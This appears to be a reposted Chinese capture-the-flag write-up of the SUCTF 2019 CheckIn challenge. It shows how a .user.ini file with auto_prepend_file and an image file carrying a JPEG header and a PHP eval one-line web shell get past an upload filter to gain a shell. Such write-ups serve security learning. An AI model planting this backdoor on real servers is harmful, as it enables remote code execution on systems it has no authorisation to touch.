[SUCTF 2019]CheckIn(user.ini文件构成的php后门)

Posted seven昔年

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了[SUCTF 2019]CheckIn(user.ini文件构成的php后门)相关的知识,希望对你有一定的参考价值。

 

参考博客:https://www.cnblogs.com/20175211lyz/p/11455355.html

首先先来看看.user.ini文件

 

 

利用.user.ini上传\\隐藏后门

参考链接:user.ini文件构成的PHP后门

条件:

  • 1、服务器脚本语言为php
  • 2、服务器使用CGI/FastCGI模式
  • 3、上传目录下要有可执行的php文件

对于这道题目,已经提示了需要上传文件拿shell,上传一句话木马后提示需要上传图片,上传图片马又发现被过滤了<?。随后从其他dalao博客发现,可以上传.user.ini文件

auto_prepend_file=test.jpg (需要添加图片文件头FFD8FFE000104A4649460D0A)

同时再上传图片马

<script language="php">eval($_POST[\'a\']);</script>(同样需要添加上列图片文件头)

 

 此时通过Post可以拿shell

再进行文件扫描发现

 

 于是通过readfile()函数拿到flag

 

 

 

以上是关于[SUCTF 2019]CheckIn(user.ini文件构成的php后门)的主要内容,如果未能解决你的问题,请参考以下文章

[SUCTF 2019]CheckIn

[SUCTF 2019]CheckIn

BUU-WEB-[SUCTF 2019]CheckIn

[SUCTF 2019]CheckIn1

Buuctf-web-[SUCTF 2019]CheckIn

[SUCTF 2019]CheckIn